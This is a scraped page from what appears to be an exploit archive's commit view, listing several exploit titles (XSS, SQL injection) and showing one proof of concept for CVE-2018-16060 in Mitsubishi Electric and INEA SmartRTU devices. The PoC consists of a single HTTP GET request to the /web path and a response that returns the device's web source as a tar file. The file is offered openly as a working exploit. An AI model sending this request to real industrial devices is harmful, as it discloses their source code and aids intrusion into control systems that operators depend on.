b17b7fe4b2
10 changes to exploits/shellcodes Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS) Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS) WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS) myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS) Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
41 lines
No EOL
936 B
Text
41 lines
No EOL
936 B
Text
# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
|
|
# Date: 2021-17-10
|
|
# Exploit Author: Hamit CİBO
|
|
# Vendor Homepage: https://www.inea.si
|
|
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
|
|
# Version: ME RTU
|
|
# Tested on: Windows
|
|
# CVE : CVE-2018-16060
|
|
|
|
|
|
# PoC
|
|
# Request
|
|
|
|
GET /web HTTP/1.1
|
|
Host: **.**.**.***
|
|
Accept-Encoding: gzip, deflate
|
|
Accept: */*
|
|
Accept-Language: en
|
|
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
|
|
x64; Trident/5.0)
|
|
Connection: close
|
|
|
|
# Response
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Wed, 08 Aug 2018 08:09:53 GMT
|
|
Server: Apache/2.4.7 (Ubuntu)
|
|
Content-Location: web.tar
|
|
Vary: negotiate
|
|
TCN: choice
|
|
Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT
|
|
ETag: "93800-5083300f58d00;51179459a2c00"
|
|
Accept-Ranges: bytes
|
|
Content-Length: 604160
|
|
Connection: close
|
|
Content-Type: application/x-tar
|
|
|
|
|
|
Reference :
|
|
|
|
https://drive.google.com/open?id=1QMHwTnBbIqrTkR0NEpnTKssYdi8vRsHH |